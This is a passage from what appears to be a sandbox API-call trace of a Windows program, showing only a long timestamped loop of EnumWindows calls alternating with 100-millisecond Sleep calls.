lParam=0x410000) [0204.740] Sleep (dwMilliseconds=0x64) [0204.777] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.780] Sleep (dwMilliseconds=0x64) [0204.817] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.818] Sleep (dwMilliseconds=0x64) [0204.825] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.826] Sleep (dwMilliseconds=0x64) [0204.854] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.855] Sleep (dwMilliseconds=0x64) [0204.893] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.894] Sleep (dwMilliseconds=0x64) [0204.933] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.934] Sleep (dwMilliseconds=0x64) [0204.983] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.984] Sleep (dwMilliseconds=0x64) [0205.031] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.032] Sleep (dwMilliseconds=0x64) [0205.042] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.043] Sleep (dwMilliseconds=0x64) [0205.074] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.076] Sleep (dwMilliseconds=0x64) [0205.117] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.118] Sleep (dwMilliseconds=0x64) [0205.139] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.140] Sleep (dwMilliseconds=0x64) [0205.158] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.159] Sleep (dwMilliseconds=0x64) [0205.233] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.234] Sleep (dwMilliseconds=0x64) [0205.271] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.272] Sleep (dwMilliseconds=0x64) [0205.282] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.283] Sleep (dwMilliseconds=0x64) [0205.347] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.348] Sleep (dwMilliseconds=0x64) [0205.380] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.381] Sleep (dwMilliseconds=0x64) [0205.385] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.386] Sleep (dwMilliseconds=0x64) [0205.421] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.422] Sleep (dwMilliseconds=0x64) [0205.456] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.458] Sleep (dwMilliseconds=0x64) [0205.461] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.462] Sleep (dwMilliseconds=0x64) [0205.536] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.537] Sleep (dwMilliseconds=0x64) [0205.538] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.539] Sleep (dwMilliseconds=0x64) [0205.576] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.577] Sleep (dwMilliseconds=0x64) [0205.614] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.615] Sleep (dwMilliseconds=0x64) [0205.622] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.623] Sleep (dwMilliseconds=0x64) [0205.652] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.653] Sleep (dwMilliseconds=0x64) [0205.693] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.694] Sleep (dwMilliseconds=0x64) [0205.705] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.706] Sleep (dwMilliseconds=0x64) [0205.734] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.735] Sleep (dwMilliseconds=0x64) [0205.777] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.778] Sleep (dwMilliseconds=0x64) [0205.795] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.796] Sleep (dwMilliseconds=0x64) [0205.818] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.819] Sleep (dwMilliseconds=0x64) [0205.856] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.857] Sleep (dwMilliseconds=0x64) [0205.873] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.873] Sleep (dwMilliseconds=0x64) [0205.876] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.877] Sleep (dwMilliseconds=0x64) [0205.897] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.898] Sleep (dwMilliseconds=0x64) [0205.934] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.935] Sleep (dwMilliseconds=0x64) [0205.949] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.950] Sleep (dwMilliseconds=0x64) [0205.974] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0205.975] Sleep (dwMilliseconds=0x64) [0206.021] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.024] Sleep (dwMilliseconds=0x64) [0206.041] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.042] Sleep (dwMilliseconds=0x64) [0206.064] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.065] Sleep (dwMilliseconds=0x64) [0206.102] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.106] Sleep (dwMilliseconds=0x64) [0206.126] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.127] Sleep (dwMilliseconds=0x64) [0206.147] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.148] Sleep (dwMilliseconds=0x64) [0206.184] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.185] Sleep (dwMilliseconds=0x64) [0206.209] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.209] Sleep (dwMilliseconds=0x64) [0206.224] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.225] Sleep (dwMilliseconds=0x64) [0206.260] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.262] Sleep (dwMilliseconds=0x64) [0206.326] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.327] Sleep (dwMilliseconds=0x64) [0206.334] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.335] Sleep (dwMilliseconds=0x64) [0206.370] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.371] Sleep (dwMilliseconds=0x64) [0206.443] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.444] Sleep (dwMilliseconds=0x64) [0206.453] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.453] Sleep (dwMilliseconds=0x64) [0206.482] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.483] Sleep (dwMilliseconds=0x64) [0206.521] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.522] Sleep (dwMilliseconds=0x64) [0206.540] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.541] Sleep (dwMilliseconds=0x64) [0206.566] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.567] Sleep (dwMilliseconds=0x64) [0206.604] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.605] Sleep (dwMilliseconds=0x64) [0206.631] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.632] Sleep (dwMilliseconds=0x64) [0206.644] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.646] Sleep (dwMilliseconds=0x64) [0206.684] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.685] Sleep (dwMilliseconds=0x64) [0206.720] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.721] Sleep (dwMilliseconds=0x64) [0206.727] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.728] Sleep (dwMilliseconds=0x64) [0206.763] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.765] Sleep (dwMilliseconds=0x64) [0206.802] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.803] Sleep (dwMilliseconds=0x64) [0206.824] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.825] Sleep (dwMilliseconds=0x64) [0206.844] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.846] Sleep (dwMilliseconds=0x64) [0206.881] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.882] Sleep (dwMilliseconds=0x64) [0206.922] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.923] Sleep (dwMilliseconds=0x64) [0206.933] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.934] Sleep (dwMilliseconds=0x64) [0206.973] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0206.974] Sleep (dwMilliseconds=0x64) [0207.026] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.027] Sleep (dwMilliseconds=0x64) [0207.042] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.043] Sleep (dwMilliseconds=0x64) [0207.077] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.079] Sleep (dwMilliseconds=0x64) [0207.121] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.122] Sleep (dwMilliseconds=0x64) [0207.142] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.143] Sleep (dwMilliseconds=0x64) [0207.159] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.160] Sleep (dwMilliseconds=0x64) [0207.195] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.197] Sleep (dwMilliseconds=0x64) [0207.227] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.228] Sleep (dwMilliseconds=0x64) [0207.235] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.236] Sleep (dwMilliseconds=0x64) [0207.272] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.274] Sleep (dwMilliseconds=0x64) [0207.346] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.347] Sleep (dwMilliseconds=0x64) [0207.358] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.359] Sleep (dwMilliseconds=0x64) [0207.388] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.389] Sleep (dwMilliseconds=0x64) [0207.425] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.426] Sleep (dwMilliseconds=0x64) [0207.448] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.449] Sleep (dwMilliseconds=0x64) [0207.466] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.467] Sleep (dwMilliseconds=0x64) [0207.503] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.504] Sleep (dwMilliseconds=0x64) [0207.534] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.535] Sleep (dwMilliseconds=0x64) [0207.543] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.554] Sleep (dwMilliseconds=0x64) [0207.607] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.611] Sleep (dwMilliseconds=0x64) [0207.689] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.690] Sleep (dwMilliseconds=0x64) [0207.700] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.701] Sleep (dwMilliseconds=0x64) [0207.732] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.733] Sleep (dwMilliseconds=0x64) [0207.770] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.772] Sleep (dwMilliseconds=0x64) [0207.787] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.788] Sleep (dwMilliseconds=0x64) [0207.811] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.812] Sleep (dwMilliseconds=0x64) [0207.849] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.850] Sleep (dwMilliseconds=0x64) [0207.886] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.887] Sleep (dwMilliseconds=0x64) [0207.891] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.891] Sleep (dwMilliseconds=0x64) [0207.929] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.930] Sleep (dwMilliseconds=0x64) [0207.966] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.967] Sleep (dwMilliseconds=0x64) [0207.979] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0207.980] Sleep (dwMilliseconds=0x64) [0208.019] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.020] Sleep (dwMilliseconds=0x64) [0208.059] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.060] Sleep (dwMilliseconds=0x64) [0208.090] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.092] Sleep (dwMilliseconds=0x64) [0208.100] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.101] Sleep (dwMilliseconds=0x64) [0208.140] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.141] Sleep (dwMilliseconds=0x64) [0208.176] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.178] Sleep (dwMilliseconds=0x64) [0208.184] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.185] Sleep (dwMilliseconds=0x64) [0208.217] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.218] Sleep (dwMilliseconds=0x64) [0208.263] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.264] Sleep (dwMilliseconds=0x64) [0208.281] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.282] Sleep (dwMilliseconds=0x64) [0208.351] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.358] Sleep (dwMilliseconds=0x64) [0208.438] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.439] Sleep (dwMilliseconds=0x64) [0208.475] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.475] Sleep (dwMilliseconds=0x64) [0208.482] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.483] Sleep (dwMilliseconds=0x64) [0208.537] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.541] Sleep (dwMilliseconds=0x64) [0208.587] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.588] Sleep (dwMilliseconds=0x64) [0208.592] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.593] Sleep (dwMilliseconds=0x64) [0208.628] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.629] Sleep (dwMilliseconds=0x64) [0208.667] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.668] Sleep (dwMilliseconds=0x64) [0208.689] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.690] Sleep (dwMilliseconds=0x64) [0208.708] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0208.709] Sleep (dwMilliseconds=0x64) [0209.979] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0209.980] Sleep (dwMilliseconds=0x64) [0210.028] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.029] Sleep (dwMilliseconds=0x64) [0210.055] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.056] Sleep (dwMilliseconds=0x64) [0210.158] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.159] Sleep (dwMilliseconds=0x64) [0210.183] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.183] Sleep (dwMilliseconds=0x64) [0210.207] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.208] Sleep (dwMilliseconds=0x64) [0210.251] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.253] Sleep (dwMilliseconds=0x64) [0210.272] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.274] Sleep (dwMilliseconds=0x64) [0210.293] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.295] Sleep (dwMilliseconds=0x64) [0210.331] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.332] Sleep (dwMilliseconds=0x64) [0210.360] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.361] Sleep (dwMilliseconds=0x64) [0210.373] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.375] Sleep (dwMilliseconds=0x64) [0210.485] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.486] Sleep (dwMilliseconds=0x64) [0210.517] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.518] Sleep (dwMilliseconds=0x64) [0210.531] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.532] Sleep (dwMilliseconds=0x64) [0210.540] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.541] Sleep (dwMilliseconds=0x64) [0210.578] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.579] Sleep (dwMilliseconds=0x64) [0210.605] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.605] Sleep (dwMilliseconds=0x64) [0210.654] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.655] Sleep (dwMilliseconds=0x64) [0210.690] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.691] Sleep (dwMilliseconds=0x64) [0210.711] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.712] Sleep (dwMilliseconds=0x64) [0210.729] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.730] Sleep (dwMilliseconds=0x64) [0210.765] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.767] Sleep (dwMilliseconds=0x64) [0210.787] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.788] Sleep (dwMilliseconds=0x64) [0210.804] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.805] Sleep (dwMilliseconds=0x64) [0210.840] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.841] Sleep (dwMilliseconds=0x64) [0210.859] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.860] Sleep (dwMilliseconds=0x64) [0210.880] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.881] Sleep (dwMilliseconds=0x64) [0210.918] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.943] Sleep (dwMilliseconds=0x64) [0210.958] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.960] Sleep (dwMilliseconds=0x64) [0210.995] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0210.996] Sleep (dwMilliseconds=0x64) [0211.033] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.034] Sleep (dwMilliseconds=0x64) [0211.039] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.040] Sleep (dwMilliseconds=0x64) [0211.077] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.078] Sleep (dwMilliseconds=0x64) [0211.113] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.115] Sleep (dwMilliseconds=0x64) [0211.119] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.119] Sleep (dwMilliseconds=0x64) [0211.156] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.157] Sleep (dwMilliseconds=0x64) [0211.180] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.181] Sleep (dwMilliseconds=0x64) [0211.196] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.197] Sleep (dwMilliseconds=0x64) [0211.233] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.235] Sleep (dwMilliseconds=0x64) [0211.253] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.254] Sleep (dwMilliseconds=0x64) [0211.272] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.273] Sleep (dwMilliseconds=0x64) [0211.308] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.309] Sleep (dwMilliseconds=0x64) [0211.318] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.318] Sleep (dwMilliseconds=0x64) [0211.345] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.346] Sleep (dwMilliseconds=0x64) [0211.409] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.409] Sleep (dwMilliseconds=0x64) [0211.424] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.425] Sleep (dwMilliseconds=0x64) [0211.461] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.462] Sleep (dwMilliseconds=0x64) [0211.498] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.499] Sleep (dwMilliseconds=0x64) [0211.502] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.502] Sleep (dwMilliseconds=0x64) [0211.538] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.540] Sleep (dwMilliseconds=0x64) [0211.575] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.576] Sleep (dwMilliseconds=0x64) [0211.586] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.587] Sleep (dwMilliseconds=0x64) [0211.616] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.617] Sleep (dwMilliseconds=0x64) [0211.652] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.654] Sleep (dwMilliseconds=0x64) [0211.661] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.662] Sleep (dwMilliseconds=0x64) [0211.692] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.693] Sleep (dwMilliseconds=0x64) [0211.725] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.728] Sleep (dwMilliseconds=0x64) [0211.730] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.731] Sleep (dwMilliseconds=0x64) [0211.766] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.767] Sleep (dwMilliseconds=0x64) [0211.800] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.801] Sleep (dwMilliseconds=0x64) [0211.840] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.841] Sleep (dwMilliseconds=0x64) [0211.877] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.878] Sleep (dwMilliseconds=0x64) [0211.911] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.912] Sleep (dwMilliseconds=0x64) [0211.914] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.915] Sleep (dwMilliseconds=0x64) [0211.950] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.951] Sleep (dwMilliseconds=0x64) [0211.982] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.983] Sleep (dwMilliseconds=0x64) [0211.990] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0211.991] Sleep (dwMilliseconds=0x64) [0212.026] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.028] Sleep (dwMilliseconds=0x64) [0212.053] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.054] Sleep (dwMilliseconds=0x64) [0212.071] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.073] Sleep (dwMilliseconds=0x64) [0212.110] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.111] Sleep (dwMilliseconds=0x64) [0212.133] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.134] Sleep (dwMilliseconds=0x64) [0212.149] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.150] Sleep (dwMilliseconds=0x64) [0212.188] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.189] Sleep (dwMilliseconds=0x64) [0212.217] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.218] Sleep (dwMilliseconds=0x64) [0212.229] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.230] Sleep (dwMilliseconds=0x64) [0212.265] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.267] Sleep (dwMilliseconds=0x64) [0212.297] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.299] Sleep (dwMilliseconds=0x64) [0212.306] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.307] Sleep (dwMilliseconds=0x64) [0212.343] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.345] Sleep (dwMilliseconds=0x64) [0212.377] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.403] Sleep (dwMilliseconds=0x64) [0212.454] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.455] Sleep (dwMilliseconds=0x64) [0212.482] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.483] Sleep (dwMilliseconds=0x64) [0212.495] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.496] Sleep (dwMilliseconds=0x64) [0212.532] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.533] Sleep (dwMilliseconds=0x64) [0212.554] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.555] Sleep (dwMilliseconds=0x64) [0212.573] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.574] Sleep (dwMilliseconds=0x64) [0212.615] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.616] Sleep (dwMilliseconds=0x64) [0212.646] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.647] Sleep (dwMilliseconds=0x64) [0212.663] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.664] Sleep (dwMilliseconds=0x64) [0212.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.708] Sleep (dwMilliseconds=0x64) [0212.735] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.736] Sleep (dwMilliseconds=0x64) [0212.748] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.749] Sleep (dwMilliseconds=0x64) [0212.787] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.788] Sleep (dwMilliseconds=0x64) [0212.825] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.825] Sleep (dwMilliseconds=0x64) [0212.827] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.828] Sleep (dwMilliseconds=0x64) [0212.864] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.865] Sleep (dwMilliseconds=0x64) [0212.902] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.903] Sleep (dwMilliseconds=0x64) [0212.915] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.916] Sleep (dwMilliseconds=0x64) [0212.945] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.946] Sleep (dwMilliseconds=0x64) [0212.983] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0212.984] Sleep (dwMilliseconds=0x64) [0213.010] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.011] Sleep (dwMilliseconds=0x64) [0213.085] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.089] Sleep (dwMilliseconds=0x64) [0213.245] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.246] Sleep (dwMilliseconds=0x64) [0213.354] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.355] Sleep (dwMilliseconds=0x64) [0213.449] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.454] Sleep (dwMilliseconds=0x64) [0213.455] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.456] Sleep (dwMilliseconds=0x64) [0213.458] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.458] Sleep (dwMilliseconds=0x64) [0213.460] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.460] Sleep (dwMilliseconds=0x64) [0213.462] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.462] Sleep (dwMilliseconds=0x64) [0213.464] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.465] Sleep (dwMilliseconds=0x64) [0213.466] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.467] Sleep (dwMilliseconds=0x64) [0213.468] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.469] Sleep (dwMilliseconds=0x64) [0213.470] EnumWindows 